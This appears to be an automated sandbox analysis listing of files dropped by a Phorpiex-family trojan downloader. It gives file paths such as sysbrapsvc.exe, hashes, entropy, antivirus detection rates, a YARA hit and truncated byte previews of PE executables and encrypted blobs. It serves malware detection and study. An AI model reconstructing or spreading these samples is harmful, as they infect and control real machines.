                                                                              Preview:... .D....{...U..!h.P..Y..s.v&...C2:S.6.........Y...r.2Z...|..........[z.M...wxtQ..?..k.8#.G`f..F..aXM|..s:........?...T.fL..h.*.3..<..UM0.G..5...t.y@0^V..|.N)H.....+.L....3..\L...t-..|....~.U.;.;...".%.. ..4+:yd..k....h_....I.%h.:....;..9.TxA.....,.......~C.}+.8*....z......).iB..l...w.G..m......k7;.L~6.4.P.j.|..h.sPv..N(.....~......&rf&5.....a|7..{..J.t.......\..JW...... be..)....k1:......Z.7..N...p'P.=Q8.4....D..x8A...s..b.i....$5.6...R.......2..*)K3.WL..Zp..P&..&J{=...c.C.....zh.Zj.B..B.[...!N.>..:....9.*v.=...L...F.C.#GO..\.. .Y6.S.{.g.f..|=.z.l......A...=R.0.Dq.h..}..R....N..@..yW..h....Q...T.W..T...D....S{9IY.A..fE...",..K....*......UtK...h.)3/.f4Q.Wi.#@..N.Z.~q.P......p....63.!...c.E..e..V..6..T.8.....`.k..?)...x.\]<S........b.A2..xK....?..... ...X&....|Lx..v..g(8YD........NL+....o=.(zu..j..2.......@.J..j...'..6=..m..;.......A..?.<J....X+.K...^(.$....1..i.......+:.R..2..|q.n.....C.o4.j.d....=......G.....s%./..'..A+..h".....wj.i..
                                                                              Process:C:\Windows\sysbrapsvc.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):8960
                                                                              Entropy (8bit):7.977787290929729
                                                                              Encrypted:false
                                                                              SSDEEP:192:AlX/Tw8qMTMejWl6IfEJkXjqREnfj9kCr6OKSF:ET5RwJlrEGGmnr9kzOK4
                                                                              MD5:8D82457B70C900A2424B5102FB14B488
                                                                              SHA1:4AD15F68CA90468BFDADAA66D1EF7CE2E973621D
                                                                              SHA-256:6D0BB70919D36B939773006943CF62BB871D1CA7B51D2518F5197931DC1A0949
                                                                              SHA-512:9DFD54FDD18B33FEDD0B91080FD45B7931B4A52C27DDD91B39444BCB52FCEDD6EF3E6400E681435A6839F9388848D173A7CDE10B6497DECD4095A2A4829545AB
                                                                              Malicious:false
                                                                              Preview:n}._.JE.......y.cv6.3.LutJ.x.<....&RygE.p.:K6.....q..j.dq~......8#<&...g.u...~V.......b]....RR."-W.5....4T.z.7ZA.g......M];3UG.)H...5a.'u.b........W.?..dc.s.^..B..`B...;.%'z...7J.hqm+..a.V.6O.U..k....$.(....KfdKP{.......M"...sGHo.....L].....-=(./........3l.@a.[....oxC...U.<-.5..x...g....\*=.g. B...nRZ.t..X}.i_...-...&:U.c..RSTud...^....3.......n.<.....Y...y.i.i..I..e.....t.wjE.J.Ie...9...n...[.~R....T...z.~-.g. .e.K.qB.g..a-2...b.g.e...G.\Kk.-.M........5..6...6.8.G...jj.+...N<"..A.Y..<..A0.P...M.X.Zd...lL...PVe..vy2......l.H.S2>...Nn.<..p5q7R......p..et \...w\.3]O.z..W.t...\<7..$.......Z./..BN.eo.....q#......q4..V..5r0....%)....-........`.....9u.......%:......oF8L...i~}.W.J.3VV..0}.4t.VT[...............O.+2..7G.t............!..r...........n.<DI3.K..I=.....0..F..l...L..W~.^.'..A..m~U<l..ab.+.GI...J..rK....Ef`..0t}0^.."..q....'..;..1..........q..1.......?n.=*.:.N.Or.sGD...j....w....._..Hi`..D.k..k..H...jA.f.i....\.&..y5......7..v...
                                                                              Process:C:\Windows\sysbrapsvc.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):11520
                                                                              Entropy (8bit):7.984543174347643
                                                                              Encrypted:false
                                                                              SSDEEP:192:nZaAKeBJXLWfMbUK6ArAprlYP6Ci20/xETikQF9DKr8XN5Rf6D:ZaFeBJXLWfmrAdlK6T6iXE80D
                                                                              MD5:5C2F49DD60A69E1D1AAA39F872551585
                                                                              SHA1:BDD4B2CAFA1779CF61C7BADFB7833EE4C953EFAD
                                                                              SHA-256:BABF2231A52BFE5C7DBD026F80CE2494811EC706637D13C24EECA071E23F35D2
                                                                              SHA-512:46F3845C05D710AE5084FD6AABCE9BE7C2C8B0DD7A0B65472A5A736F7BBEB1F4904093FF29D03463008F8D77905EC4C940A7E3A3B124C937EBF3251C332164C9
                                                                              Malicious:false
                                                                              Preview:Mi.f.........Oxy.rE.r.W.3..(.[1r..<g?..p...R=..{.e%2...s......5..\.s.[..Y.......C.b../.>U..W.R'..:...lC...s.,.f}..).O....%^w>./..B.1.........B?...9.........sn.b...(..U.qP+..b@.9.5..1....).}..q..4..s.Of....kS.....i...n).>|S/v5F .7H..U.6....C20q..3C..01.........0..|Z7.U.(o.^....x*...J....X..yM.z........:..#^...E[....q3........L..\.?.w..5..T_..Z...A#.[j..qU.yG. ).....1.....a.]..rbwlZQ..ua...f...bn..pn..3,.k#.....k...!..rq..B...9O....8X...Y......%pQ....fC.8..GD.oyPyWo?!./nZz.K.|.....C........[...-.E...gE..eGpwu.y..h.%.,.5.G.......j...JP.!..mm.H.Qr..)o..V.....J<..Wh#<.."T..f.+8}K4..&sR'{.n..L.g..u9N..Y.R.s.....^.sA......7.G.....2..m..I.8.Yj..{........*%a..U=Xg....&TR.g....&.B5w..ir.oW.+..8.dln.r..t..h..w...ID&.4..P..".T@U.j....'...E_.rM.zA..l!F......}f......su.n..fb..3..#....C4..&@.@G1.. ..i..oC..,.WA..Zw.....d3!.Ls...F=. .....?.T...{ .......R.*.M.].V?:HK../../...|.f"?....6ed..f.IM......."..3...\Dy......s.....:y.KhNFwY."o...Q..t..yF....t9.....
                                                                              Process:C:\Windows\sysbrapsvc.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):81928
                                                                              Entropy (8bit):7.9977582028689165
                                                                              Encrypted:true
                                                                              SSDEEP:1536:pm0MZsv8GxSYZCQGoPTBygAku+XJIE+ch9tYoKRcw+RLJznfl0:p56QIQGoLBygAkMc2oKRcwYBfl0
                                                                              MD5:2FF2BB06682812EEB76628BFBE817FBB
                                                                              SHA1:18E86614D0F4904E1FE97198CCDA34B25AAB7DAE
                                                                              SHA-256:985DA56FB594BF65D8BB993E8E37CD6E78535DA6C834945068040FAF67E91E7D
                                                                              SHA-512:5CD3B5A1E16202893B08C0AE70D3BCD9E7A49197EBF1DED08E01395202022B3B6C2D8837196EF0415FEA6497D928B44E03544B934F8E062DDBB6C6F79FB6F440
                                                                              Malicious:false
                                                                              Preview:NGS!.......`.%X6I.4#.(Nr...*.FT>:hNGJ.7....8.....! DX..m.SX.;....=....q...z(s Q..#w.+W`.JVj.ee.;p.~....a3.._....,...8h.:...p<c..'C+...H.@9....7ag'.....s.D.Hg.;.G.lI.x.2.~...."e.G...p.420.f$..-*...>.No.7.#...#tv..[..d<.d....G......."..v5.#..c..|...]...r.W.p....~.%r.[hZ._.8...l.l?l2,.... ..t.n..1K....q.WpA..e rs .....?!9.....s.,i.}...G..:.x}. M..]:w..T......U+.v*.@V-.7.m.+....j!Lq.mJ.mVH...i......Y.....H..q...........[.J........G..........1..j\..Z.+J2[?...#..fzY...V...".9....(..U......W.I..J's..-OW.`....o.0.pm..R...Va.j..;......wm57*....i..Wy....s..e.s.Z....5{(.|.+.t.D.........o>.D.Qb.d..........W}...@.^=w%}..C?.2.EN4j..fi../...kOp.......p....Z.6.......I$.a.J....._../.0.2.....8.M...*J.0........y.!=...g[...v]c.@9...d.......^..H2..~l....(....p..c.-'.7J..a............g...P.....Y.....P....mt&./...btva...}..gfu;'........Z.~..[..V.n~5.R.k.M..@.q./.:..=..`:...G^..'C.T..<C.z.v...`.b=./>.&-U.|....p......j......M.,../.fW..O.4].9..D...-\F.'.b..O.Q...W
                                                                              Process:C:\Windows\sysbrapsvc.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):14848
                                                                              Entropy (8bit):5.83680185257089
                                                                              Encrypted:false
                                                                              SSDEEP:192:7Jb/ex9kh6DP0kat+m2VhnHaxOn8JxThDiFGPkWSctFxhu0Rh:1b/ik+0ka8Hnzn8tbcWScphu
                                                                              MD5:D085F41FE497A63DC2A4882B485A2CAF
                                                                              SHA1:9DC111412129833495F19D7B8A5500CF7284AD68
                                                                              SHA-256:FB11B4E2D26812E26EA7428F3B0B9BB8A16814188250FA60697C7AEC40A49BD0
                                                                              SHA-512:ED4D8E297094248FB536154ED0427F4CC1832F339CE29D0F782971EDE42FA2B9E5F953F73E71D0CFC026E5FD2EC0F7062410AF359FD940A14F277ADCA37FC106
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              • Antivirus: ReversingLabs, Detection: 96%
                                                                              Joe Sandbox View:
• Filename: I7ldmFS13W.exe, Detection: malicious
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......._.<...R...R...R.<q)...R.......R...S.|.R......R......R......R......R.Rich..R.................PE..L.....)f.............................!.......0....@.......................................@..................................9.......`.......................p......................................(9..@............0...............................text...J........................... ..`.rdata.......0......................@..@.data........P.......0..............@....rsrc........`.......2..............@..@.reloc.......p.......6..............@..B........................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Users\user\AppData\Local\Temp\1146722911.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):8704
                                                                              Entropy (8bit):5.127434566848382
                                                                              Encrypted:false
                                                                              SSDEEP:96:zMPnhiWEdtD3Vcq+BID1dCDGJxGEdq2qhHC7tCEpUy:zMPhiWucq++D/CDGJxTdqthsi
                                                                              MD5:9B8A3FB66B93C24C52E9C68633B00F37
                                                                              SHA1:2A9290E32D1582217EAC32B977961ADA243ADA9A
                                                                              SHA-256:8A169CF165F635ECB6C55CACECB2C202C5FC6EF5FA82EC9CDB7D4B0300F35293
                                                                              SHA-512:117DA1EC9850212E4CAFCE6669C2CFFFC8078627F5C3CCDFD6A1BF3BEE2D351290071087A4C206578D23852FA5E69C2EBEFD71905C85B1EAED4220932BB71A39
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 30%
                                                                              Joe Sandbox View:
• Filename: I7ldmFS13W.exe, Detection: malicious
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......k.Y/.../.../...&.`.-...&.f.....&.p.:....s..".../.......&.w.,...&.b.....Rich/...........................PE..L....s:f..................................... ....@..........................`............@..................................$..x....@.......................P..t....................................#..@............ ...............................text............................... ..`.rdata..x.... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc..2....P......................@..B................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Windows\sysbrapsvc.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):81928
                                                                              Entropy (8bit):7.9977582028689165
                                                                              Encrypted:true
                                                                              SSDEEP:1536:pm0MZsv8GxSYZCQGoPTBygAku+XJIE+ch9tYoKRcw+RLJznfl0:p56QIQGoLBygAkMc2oKRcwYBfl0
                                                                              MD5:2FF2BB06682812EEB76628BFBE817FBB
                                                                              SHA1:18E86614D0F4904E1FE97198CCDA34B25AAB7DAE
                                                                              SHA-256:985DA56FB594BF65D8BB993E8E37CD6E78535DA6C834945068040FAF67E91E7D
                                                                              SHA-512:5CD3B5A1E16202893B08C0AE70D3BCD9E7A49197EBF1DED08E01395202022B3B6C2D8837196EF0415FEA6497D928B44E03544B934F8E062DDBB6C6F79FB6F440
                                                                              Malicious:true
                                                                              Preview:NGS!.......`.%X6I.4#.(Nr...*.FT>:hNGJ.7....8.....! DX..m.SX.;....=....q...z(s Q..#w.+W`.JVj.ee.;p.~....a3.._....,...8h.:...p<c..'C+...H.@9....7ag'.....s.D.Hg.;.G.lI.x.2.~...."e.G...p.420.f$..-*...>.No.7.#...#tv..[..d<.d....G......."..v5.#..c..|...]...r.W.p....~.%r.[hZ._.8...l.l?l2,.... ..t.n..1K....q.WpA..e rs .....?!9.....s.,i.}...G..:.x}. M..]:w..T......U+.v*.@V-.7.m.+....j!Lq.mJ.mVH...i......Y.....H..q...........[.J........G..........1..j\..Z.+J2[?...#..fzY...V...".9....(..U......W.I..J's..-OW.`....o.0.pm..R...Va.j..;......wm57*....i..Wy....s..e.s.Z....5{(.|.+.t.D.........o>.D.Qb.d..........W}...@.^=w%}..C?.2.EN4j..fi../...kOp.......p....Z.6.......I$.a.J....._../.0.2.....8.M...*J.0........y.!=...g[...v]c.@9...d.......^..H2..~l....(....p..c.-'.7J..a............g...P.....Y.....P....mt&./...btva...}..gfu;'........Z.~..[..V.n~5.R.k.M..@.q./.:..=..`:...G^..'C.T..<C.z.v...`.b=./>.&-U.|....p......j......M.,../.fW..O.4].9..D...-\F.'.b..O.Q...W
                                                                              Process:C:\Windows\sysbrapsvc.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):22016
                                                                              Entropy (8bit):5.998352128147808
                                                                              Encrypted:false
                                                                              SSDEEP:384:AobmOaVs9vIgkUDsj8Uvw5dTxJjY5av8U9c+yweeeeeeeeWeeeee9MMp:maGOi8UvWdrAa0U1TeeeeeeeeWeeeee
                                                                              MD5:802C60DB52BD6C4DB699A74F63A00D8D
                                                                              SHA1:D9EA28E0576ED14D73A2B8B31933473C00C18EBA
                                                                              SHA-256:F63C124598C87BED71A1E5E6EC5A04E8AA2F18F94B21D690513C5490F7F85991
                                                                              SHA-512:71077859AD12A90A6883DDBB9CF9052173DE4D7008F674D87DDB5BEA1724204F1D66CB4736E8A6C249F223A38A296790A1FBE006BE317058787C5FFDBE0852B8
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              Joe Sandbox View:
                                                                              • Filename: I7ldmFS13W.exe, Detection: malicious
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q'..5Fv^5Fv^5Fv^...^9Fv^<>.^6Fv^5Fw^UFv^<>.^7Fv^<>.^ Fv^<>.^0Fv^<>.^4Fv^Rich5Fv^................PE..L...._;f................."...0.......+.......@....@..................................~....@..................................N......................................................................0N..@............@...............................text.... .......".................. ..`.rdata.......@.......&..............@..@.data........`.......>..............@....rsrc................N..............@..@.reloc...............R..............@..B........................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Users\user\AppData\Local\Temp\1146722911.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):8704
                                                                              Entropy (8bit):5.127434566848382
                                                                              Encrypted:false
                                                                              SSDEEP:96:zMPnhiWEdtD3Vcq+BID1dCDGJxGEdq2qhHC7tCEpUy:zMPhiWucq++D/CDGJxTdqthsi
                                                                              MD5:9B8A3FB66B93C24C52E9C68633B00F37
                                                                              SHA1:2A9290E32D1582217EAC32B977961ADA243ADA9A
                                                                              SHA-256:8A169CF165F635ECB6C55CACECB2C202C5FC6EF5FA82EC9CDB7D4B0300F35293
                                                                              SHA-512:117DA1EC9850212E4CAFCE6669C2CFFFC8078627F5C3CCDFD6A1BF3BEE2D351290071087A4C206578D23852FA5E69C2EBEFD71905C85B1EAED4220932BB71A39
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 30%
                                                                              Joe Sandbox View:
                                                                              • Filename: I7ldmFS13W.exe, Detection: malicious
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......k.Y/.../.../...&.`.-...&.f.....&.p.:....s..".../.......&.w.,...&.b.....Rich/...........................PE..L....s:f..................................... ....@..........................`............@..................................$..x....@.......................P..t....................................#..@............ ...............................text............................... ..`.rdata..x.... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc..2....P......................@..B................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Users\user\AppData\Local\Temp\1146722911.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):8704
                                                                              Entropy (8bit):5.127434566848382
                                                                              Encrypted:false
                                                                              SSDEEP:96:zMPnhiWEdtD3Vcq+BID1dCDGJxGEdq2qhHC7tCEpUy:zMPhiWucq++D/CDGJxTdqthsi
                                                                              MD5:9B8A3FB66B93C24C52E9C68633B00F37
                                                                              SHA1:2A9290E32D1582217EAC32B977961ADA243ADA9A
                                                                              SHA-256:8A169CF165F635ECB6C55CACECB2C202C5FC6EF5FA82EC9CDB7D4B0300F35293
                                                                              SHA-512:117DA1EC9850212E4CAFCE6669C2CFFFC8078627F5C3CCDFD6A1BF3BEE2D351290071087A4C206578D23852FA5E69C2EBEFD71905C85B1EAED4220932BB71A39
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 30%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......k.Y/.../.../...&.`.-...&.f.....&.p.:....s..".../.......&.w.,...&.b.....Rich/...........................PE..L....s:f..................................... ....@..........................`............@..................................$..x....@.......................P..t....................................#..@............ ...............................text............................... ..`.rdata..x.... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc..2....P......................@..B................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Windows\sysbrapsvc.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):11264
                                                                              Entropy (8bit):5.27490951248017
                                                                              Encrypted:false
                                                                              SSDEEP:96:PXoAr3+ZhXdzIqD0Mc6ygp4y2wNM+ZSxyqEG0/4qVA5JxGED2qpc2C7tCE1/St8:foaOZ3Rc6y5kSxWwqWJxTDtpw
                                                                              MD5:CAFD277C4132F5D0F202E7EA07A27D5C
                                                                              SHA1:72C8C16A94CCE56A3E01D91BC1276DAFC65B351D
                                                                              SHA-256:E5162FA594811F0F01FC76F4ACBD9FE99B2265DF9CFCBC346023F28775C19F1E
                                                                              SHA-512:7C87D1DEC61B78E0F223E8F9FEC019D96509813FA6D96129289AAB00B2D6F05BF91FE1FAFD680B7D9E746F4C2C8CBE48A3028BCAAD479048D00D79A19F71B196
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 38%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q.."5..q5..q5..q<..q7..q<..q7..q<..q ..q.;.q>..q5..q...q<..q6..q<..q4..qRich5..q................PE..L...M56f............................v........ ....@..........................`.......u....@..................................)..x....@.......................P......................................@(..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc........@.......$..............@..@.reloc.."....P.......(..............@..B........................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Windows\sysbrapsvc.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):81928
                                                                              Entropy (8bit):7.9977582028689165
                                                                              Encrypted:true
                                                                              SSDEEP:1536:pm0MZsv8GxSYZCQGoPTBygAku+XJIE+ch9tYoKRcw+RLJznfl0:p56QIQGoLBygAkMc2oKRcwYBfl0
                                                                              MD5:2FF2BB06682812EEB76628BFBE817FBB
                                                                              SHA1:18E86614D0F4904E1FE97198CCDA34B25AAB7DAE
                                                                              SHA-256:985DA56FB594BF65D8BB993E8E37CD6E78535DA6C834945068040FAF67E91E7D
                                                                              SHA-512:5CD3B5A1E16202893B08C0AE70D3BCD9E7A49197EBF1DED08E01395202022B3B6C2D8837196EF0415FEA6497D928B44E03544B934F8E062DDBB6C6F79FB6F440
                                                                              Malicious:true
                                                                              Preview:NGS!.......`.%X6I.4#.(Nr...*.FT>:hNGJ.7....8.....! DX..m.SX.;....=....q...z(s Q..#w.+W`.JVj.ee.;p.~....a3.._....,...8h.:...p<c..'C+...H.@9....7ag'.....s.D.Hg.;.G.lI.x.2.~...."e.G...p.420.f$..-*...>.No.7.#...#tv..[..d<.d....G......."..v5.#..c..|...]...r.W.p....~.%r.[hZ._.8...l.l?l2,.... ..t.n..1K....q.WpA..e rs .....?!9.....s.,i.}...G..:.x}. M..]:w..T......U+.v*.@V-.7.m.+....j!Lq.mJ.mVH...i......Y.....H..q...........[.J........G..........1..j\..Z.+J2[?...#..fzY...V...".9....(..U......W.I..J's..-OW.`....o.0.pm..R...Va.j..;......wm57*....i..Wy....s..e.s.Z....5{(.|.+.t.D.........o>.D.Qb.d..........W}...@.^=w%}..C?.2.EN4j..fi../...kOp.......p....Z.6.......I$.a.J....._../.0.2.....8.M...*J.0........y.!=...g[...v]c.@9...d.......^..H2..~l....(....p..c.-'.7J..a............g...P.....Y.....P....mt&./...btva...}..gfu;'........Z.~..[..V.n~5.R.k.M..@.q./.:..=..`:...G^..'C.T..<C.z.v...`.b=./>.&-U.|....p......j......M.,../.fW..O.4].9..D...-\F.'.b..O.Q...W
                                                                              Process:C:\Windows\sysbrapsvc.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):100864
                                                                              Entropy (8bit):6.233380923101525
                                                                              Encrypted:false
                                                                              SSDEEP:1536:79H3LJvFmav82tiLZoS/0XOD7fiq4kzNEAAkHK:hHbCOqb/+i7fRekHK
                                                                              MD5:0A547347B0B9AF0290B263DFA8D71EBE
                                                                              SHA1:5FF176BFE5E0255A68C8E3D132AFBFF795A1FC1D
                                                                              SHA-256:B00AA26D9D7889613C7552CE6E17B0264788E24C6166EDCF68C47F209CA767F8
                                                                              SHA-512:8E3795BC46783F970C63C56D340E1EB47346BD3E7A9050ED7D1FAC77CDCF96E9EC2A955D56B60CA68556A160AB4C0116B2A51D0BBEE91C5DED72A3B2B81D5FB0
                                                                              Malicious:true
                                                                              Yara Hits:
                                                                              • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: C:\Users\user\AppData\Local\Temp\3193211493.exe, Author: Joe Security
                                                                              Antivirus:
                                                                              • Antivirus: Avira, Detection: 100%
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              • Antivirus: ReversingLabs, Detection: 79%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.qj)..9)..9)..9 ..9...9Q..8+..9..B9+..9..@9(..9...9+..9..r9-..9)..9...9..d9<..9 ..9-..9 ..95..9 ..9(..9Rich)..9........................PE..L....02f.............................u............@.........................................................................l).......................................................................................... ............................text............................... ..`.rdata..:9.......:..................@..@.data....w...@...d...&..............@...................................................................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Windows\sysbrapsvc.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):8704
                                                                              Entropy (8bit):5.068292259868492
                                                                              Encrypted:false
                                                                              SSDEEP:96:+5CDsnMkI2dyDHFcq+BIkAs7n3QJxGENUOq2qh3C7tCEI4LO:+52sMkIDcq++viQJxTNUOqthcI4K
                                                                              MD5:11D2F27FB4F0C424AB696573E79DB18C
                                                                              SHA1:D08ECE21A657BFA6EA4D2DB9B21FBB960D7F4331
                                                                              SHA-256:DEE9DCA027009B7D2885ACE7B968D2E9505A41B34756B08343338F8EF259E9BE
                                                                              SHA-512:A60DE41CAA6113430AB4AB944B800579F574F9B964C362F9C62BBFC1BD85DCCD01B628809367E15CFE6BAABA32C1255F8DB07E434FF7BCF5E90D9B3D1F6A4CD4
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              • Antivirus: ReversingLabs, Detection: 62%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......k.Y/.../.../...&.`.-...&.f.....&.p.:....s..".../.......&.w.,...&.b.....Rich/...........................PE..L...X.8f............................@........ ....@..........................`......k.....@..................................$..x....@.......................P..`...................................P#..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Windows\sysbrapsvc.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):4096
                                                                              Entropy (8bit):4.812492307333934
                                                                              Encrypted:false
                                                                              SSDEEP:96:gGTlz8/YYd48cUlqcFBtiA2ByJ5G+vt9OobxUql70/a0cpHtM:rzCXd48oQitA7G+iUGRcA
                                                                              MD5:139CC3E34A16B56A9EAE4A815668F40D
                                                                              SHA1:FC1AA1349D9821633A1CEF53C18A82D013A9B98B
                                                                              SHA-256:072C6AA931CE5EC96A84259636C353164407F355503193ED5A8DAC072E5F811D
                                                                              SHA-512:2BB58EFBF5CF368DAF1EB0DA303A5EFDB7E778D80D30363B1DB7D79036DF082191421FD82632BAE1BF855B820D5893868FAF3545A050D912CD62F06276D7848A
                                                                              Malicious:false
                                                                              Preview:.Fy.....Y..G....T5.j...._........#+q.....................$j.....[.*......N....X..j......,*.......Q....\/......_;.......#............._;....................[.:.....F5.....m..................F....W.......%..6....m>.O......Z..............Lv.......~....W..A....\/|6....P........A.................I......yQ....%c6.....mJE+...._;.......".....N'......R..(....M,.......m.....T.H.....<.........E......."......q......dc.............x.c....._:.......#......^.......N'.j....%..%.....?L&...................>......%.........vR....Y..j....Y.xR.....u........i......>......?]>............X.N....]vc.............N&k.......I......................B......`......lM........8....\.......N'.)....%.........|>....]..E......^.......9V.....x........C............._9.r....M.).....Y.......\/.3.....?F^......:.....-..z....PP.Y....%x......_.W...........Y.5n.............................Q.............x......_;......R.......g.M.....U.V.....Yj.:....N'.6....^.Ez....\|......[\.g.....Y......Y.>.....;[.s......`.....
                                                                              Process:C:\Users\user\AppData\Local\Temp\1146722911.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):14848
                                                                              Entropy (8bit):5.83680185257089
                                                                              Encrypted:false
                                                                              SSDEEP:192:7Jb/ex9kh6DP0kat+m2VhnHaxOn8JxThDiFGPkWSctFxhu0Rh:1b/ik+0ka8Hnzn8tbcWScphu
                                                                              MD5:D085F41FE497A63DC2A4882B485A2CAF
                                                                              SHA1:9DC111412129833495F19D7B8A5500CF7284AD68
                                                                              SHA-256:FB11B4E2D26812E26EA7428F3B0B9BB8A16814188250FA60697C7AEC40A49BD0
                                                                              SHA-512:ED4D8E297094248FB536154ED0427F4CC1832F339CE29D0F782971EDE42FA2B9E5F953F73E71D0CFC026E5FD2EC0F7062410AF359FD940A14F277ADCA37FC106
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              • Antivirus: ReversingLabs, Detection: 96%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......._.<...R...R...R.<q)...R.......R...S.|.R......R......R......R......R.Rich..R.................PE..L.....)f.............................!.......0....@.......................................@..................................9.......`.......................p......................................(9..@............0...............................text...J........................... ..`.rdata.......0......................@..@.data........P.......0..............@....rsrc........`.......2..............@..@.reloc.......p.......6..............@..B........................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):100864
                                                                              Entropy (8bit):6.233380923101525
                                                                              Encrypted:false
                                                                              SSDEEP:1536:79H3LJvFmav82tiLZoS/0XOD7fiq4kzNEAAkHK:hHbCOqb/+i7fRekHK
                                                                              MD5:0A547347B0B9AF0290B263DFA8D71EBE
                                                                              SHA1:5FF176BFE5E0255A68C8E3D132AFBFF795A1FC1D
                                                                              SHA-256:B00AA26D9D7889613C7552CE6E17B0264788E24C6166EDCF68C47F209CA767F8
                                                                              SHA-512:8E3795BC46783F970C63C56D340E1EB47346BD3E7A9050ED7D1FAC77CDCF96E9EC2A955D56B60CA68556A160AB4C0116B2A51D0BBEE91C5DED72A3B2B81D5FB0
                                                                              Malicious:true
                                                                              Yara Hits:
                                                                              • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: C:\Windows\sysbrapsvc.exe, Author: Joe Security
                                                                              Antivirus:
                                                                              • Antivirus: Avira, Detection: 100%
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              • Antivirus: ReversingLabs, Detection: 79%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.qj)..9)..9)..9 ..9...9Q..8+..9..B9+..9..@9(..9...9+..9..r9-..9)..9...9..d9<..9 ..9-..9 ..95..9 ..9(..9Rich)..9........................PE..L....02f.............................u............@.........................................................................l).......................................................................................... ............................text............................... ..`.rdata..:9.......:..................@..@.data....w...@...d...&..............@...................................................................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Users\user\AppData\Local\Temp\1146722911.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):14848
                                                                              Entropy (8bit):5.83680185257089
                                                                              Encrypted:false
                                                                              SSDEEP:192:7Jb/ex9kh6DP0kat+m2VhnHaxOn8JxThDiFGPkWSctFxhu0Rh:1b/ik+0ka8Hnzn8tbcWScphu
                                                                              MD5:D085F41FE497A63DC2A4882B485A2CAF
                                                                              SHA1:9DC111412129833495F19D7B8A5500CF7284AD68
                                                                              SHA-256:FB11B4E2D26812E26EA7428F3B0B9BB8A16814188250FA60697C7AEC40A49BD0
                                                                              SHA-512:ED4D8E297094248FB536154ED0427F4CC1832F339CE29D0F782971EDE42FA2B9E5F953F73E71D0CFC026E5FD2EC0F7062410AF359FD940A14F277ADCA37FC106
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 96%
                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
